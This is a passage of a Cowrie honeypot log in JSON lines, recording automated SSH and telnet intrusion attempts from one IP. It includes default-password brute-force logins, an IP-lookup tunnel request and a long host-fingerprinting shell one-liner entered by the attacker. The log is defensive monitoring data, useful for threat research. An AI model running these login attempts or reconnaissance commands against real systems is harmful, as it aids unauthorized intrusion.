cdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:03:56.290241Z","src_ip":"212.227.235.229","session":"61e6078152a7"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:56.511020Z","src_ip":"212.227.235.229","session":"0170087132d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43584,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd1f054ef41c","protocol":"telnet","message":"New connection: 212.227.235.229:43584 (1.2.3.4:23) [session: fd1f054ef41c]","sensor":"my-vps","timestamp":"2025-08-26T21:03:57.056706Z"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:03:57.233854Z","src_ip":"212.227.235.229","session":"61e6078152a7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:03:57.486616Z","session":"61e6078152a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:03:57.895294Z","src_ip":"212.227.235.229","session":"61e6078152a7"}
{"eventid":"cowrie.login.success","username":"root","password":"21","message":"login attempt [root/21] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:03:59.384207Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:03:59.870805Z","src_ip":"212.227.235.229","session":"61e6078152a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:04:00.909645Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.910341Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.910962Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.912072Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.913341Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.913948Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.914876Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.915939Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.916576Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.917159Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.917629Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.918419Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:04:00.919111Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:04:01.993105Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:01.994548Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:01.995961Z","src_ip":"212.227.235.229","session":"c1745c316459"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44608,"dst_ip":"1.2.3.4","dst_port":22,"session":"da4253bf7567","protocol":"ssh","message":"New connection: 212.227.235.229:44608 (1.2.3.4:22) [session: da4253bf7567]","sensor":"my-vps","timestamp":"2025-08-26T21:04:03.214392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:03.354856Z","src_ip":"212.227.235.229","session":"da4253bf7567"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:03.706189Z","src_ip":"212.227.235.229","session":"da4253bf7567"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-26T21:04:04.834830Z","src_ip":"212.227.235.229","session":"da4253bf7567"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:06.283971Z","src_ip":"212.227.235.229","session":"da4253bf7567"}
{"eventid":"cowrie.session.closed","duration":10.32624864578247,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:07.382896Z","src_ip":"212.227.235.229","session":"fd1f054ef41c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57194,"dst_ip":"1.2.3.4","dst_port":22,"session":"c989319d2166","protocol":"ssh","message":"New connection: 212.227.235.229:57194 (1.2.3.4:22) [session: c989319d2166]","sensor":"my-vps","timestamp":"2025-08-26T21:04:21.967906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:22.031705Z","src_ip":"212.227.235.229","session":"c989319d2166"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:22.294832Z","src_ip":"212.227.235.229","session":"c989319d2166"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T21:04:23.532865Z","src_ip":"212.227.235.229","session":"c989319d2166"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:24.819599Z","src_ip":"212.227.235.229","session":"c989319d2166"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45132,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f798280450","protocol":"ssh","message":"New connection: 212.227.235.229:45132 (1.2.3.4:22) [session: 77f798280450]","sensor":"my-vps","timestamp":"2025-08-26T21:04:28.526785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:28.561590Z","src_ip":"212.227.235.229","session":"77f798280450"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:04:29.026472Z","src_ip":"212.227.235.229","session":"77f798280450"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-26T21:04:31.273143Z","src_ip":"212.227.235.229","session":"77f798280450"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:04:33.348286Z","src_ip":"212.227.235.229","session":"77f798280450"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45142,"dst_ip":"1.2.3.4","dst_port":22,"session":"919afb491bec","protocol":"ssh","message":"New connection: 212.227.235.229:45142 (1.2.3.4:22) [session: 919afb491bec]","sensor":"my-vps","timestamp":"2025-08-26T21:04:34.002944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:04:35.603441Z","src_ip":"212.227.235.229","session":"919afb491bec"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-